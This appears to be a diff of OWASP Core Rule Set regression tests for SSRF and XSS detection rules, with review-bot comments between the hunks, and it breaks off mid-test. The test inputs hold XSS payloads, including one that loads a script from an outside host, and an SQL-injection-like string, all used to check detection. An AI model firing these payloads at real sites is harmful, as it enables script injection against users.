- uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo="
- version: "HTTP/1.1"
- output:
- log_contains: id "934170"
- - test_title: 934170-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo="
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934170"
+ - test_id: 2
desc: "Negative test - data:// should not match"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo="
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934170"
- - test_title: 934170-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo="
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "934170"
+ - test_id: 3
desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=data:text/plain"
- version: "HTTP/1.1"
- output:
- log_contains: id "934170"
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=data:text/plain"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934170"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
index e2f420869..a198c9b50 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
@@ -1,107 +1,99 @@
---
meta:
author: "csanders-git, Walter Hop, azurit"
- enabled: true
- name: "941100.yaml"
description: "Tests to trigger, or not trigger 941100"
+rule_id: 941100
tests:
- - test_title: 941100-1
+ - test_id: 1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- log_contains: id "941100"
- - test_title: 941100-2
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "941100"
+ - test_id: 2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E"
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- log_contains: id 
"941100"
- - test_title: 941100-3
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "941100"
+ - test_id: 3
desc: XSS testing of libinjection in User-Agent
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get"
- headers:
- User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- log_contains: id "941100"
- - test_title: 941100-4
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get"
+ headers:
+ User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "941100"
+ - test_id: 4
desc: XSS testing of libinjection in User-Agent
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get"
- headers:
- User-Agent: "OWASP CRS test agent"
- Referer: http://www.coreruleset.org
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- no_log_contains: id "941100"
- - test_title: 941100-5
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Referer: http://www.coreruleset.org 
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "941100"
+ - test_id: 5
desc: XSS testing of libinjection in User-Agent
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get"
- headers:
- User-Agent: "OWASP CRS test agent"
- Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- no_log_contains: id "941100"
- - test_title: 941100-6
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "941100"
+ - test_id: 6
desc: Status Page Test - simplified XSS testing of libinjection in ARGS
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: POST
- port: 80
- uri: "/post"
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- data:
- foo=
- version: "HTTP/1.1"
- output:
- log_contains: id "941100"
+ - input:
+ dest_addr: 127.0.0.1
+ method: POST
+ port: 80
+ uri: "/post"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ data: foo=
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "941100"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
index fb0718523..7b42a9758 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
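Review bot: Tests 4 and 5 carry `desc: XSS testing of libinjection in User-Agent` but send the stock `User-Agent: "OWASP CRS test agent"` and put the value under test in `Referer` (`http://www.coreruleset.org` in test 4, the `setTimeout(...)` payload in test 5), both asserting `no_log_contains`; the description is a copy of test 3 and misstates what is covered. Suggest `desc: Benign Referer must not trigger 941100` for test 4 and `desc: XSS payload in Referer must not trigger 941100 (Referer not inspected by this rule - confirm)` for test 5. Separately, test 6 as shown posts `data: foo=` with an empty value, which gives libinjection nothing to flag while still asserting `log_contains: id "941100"`; if the payload was lost when this page was rendered the point is moot, otherwise the body needs an actual XSS payload in the value for the test to mean anything.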
@@ -1,54 +1,50 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - enabled: true - name: "941101.yaml" description: "Test to trigger 941101" +rule_id: 941101 tests: - - test_title: 941101-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: www.github.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: xyz= + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 2 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?x=alert(1);" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?x=alert(1);" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 3 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "<script+>alert(1);</script>=value" - Host: localhost - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "<script+>alert(1);</script>=value" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 4 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: "" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Referer: "" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 5 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" + headers: + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 6 desc: XSS in payload using %uNNNN stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 7 desc: XSS in payload with individual code points urlencoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: 
application/x-www-form-urlencoded + data: | + var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 8 desc: XSS in cookie name using unicode stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Cookie: <script >alert(1)</script>=value - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-9 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Cookie: <script >alert(1)</script>=value + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 9 desc: XSS in Referer using html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "<script+>alert(1);</script>" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-10 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "<script+>alert(1);</script>" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 10 desc: GH issue 1481 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" - headers: - User-Agent: "OWASP CRS test agent" - 
Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- version: "HTTP/1.1"
- output:
- no_log_contains: id "941110"
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value"
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "941110"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
index 3a705d494..d5d2580c7 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
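Review bot: The file is tagged `rule_id: 941101` and its description says it tests 941101, yet every stage in the hunk asserts `log_contains: id "941110"` (and test 10 `no_log_contains: id "941110"`); if the new runner uses `rule_id` to select the tests for a rule, a regression in 941101 would pass unnoticed because nothing here checks that id. Either the assertions should read `id "941101"`, or this file is a copy of the 941110 tests and the header and `rule_id` should say so. Separately, test 1 changes its input from `Referer: www.github.com` to `Cookie: xyz=` inside an otherwise mechanical format migration; that change deserves its own commit or at least a `desc:` saying why the vector moved (the header values may be truncated in this copy, so confirm against the file). The hunk is self-contained.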
@@ -2,103 +2,95 @@ meta: author: "Christian S.J. Peron, Walter Hop, azurit" description: None - enabled: true - name: 941120.yaml tests: - - test_title: 941120-1 + - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onload%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onload%3d%20=vardata" + version: HTTP/1.0 + output: + log_contains: id "941120" + - test_id: 2 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefgh%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefgh%3d%20=vardata" + version: HTTP/1.0 + output: + log_contains: id "941120" + - test_id: 3 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onab%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onab%3d%20=vardata" + version: HTTP/1.0 + output: + no_log_contains: id "941120" + - test_id: 4 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" + version: HTTP/1.0 + output: + no_log_contains: id "941120" + - test_id: 5 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: 
id "941120" - - test_title: 941120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "941120" + - test_id: 6 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log_contains: id "941120" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a8eb1bf2..a856409c0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml 
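Review bot: The `meta` block drops `enabled` and `name` but, unlike the 941101, 941130, 941140 and 941150 hunks in this same patch, adds no `rule_id: 941120`, so this file is left unkeyed if the new format derives the rule under test from `rule_id`. `description: None` is also the literal string "None" rather than a null and says nothing; suggest `rule_id: 941120` and `description: "Tests to trigger, or not trigger 941120"`. Minor style point: `version: HTTP/1.0` is unquoted throughout this file while the neighbouring files quote `"HTTP/1.1"`; pick one form for the migrated files.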
@@ -2,326 +2,306 @@ meta: author: "csanders-git, Christian Folini, azurit" description: "Tests to trigger, or not trigger 941130" - enabled: true - name: 941130.yaml +rule_id: 941130 tests: - - test_title: 941130-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941130" - - test_title: 941130-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941130" + - test_id: 2 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 
"var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 3 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=aai" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=aai" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 4 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=abcd'||(select 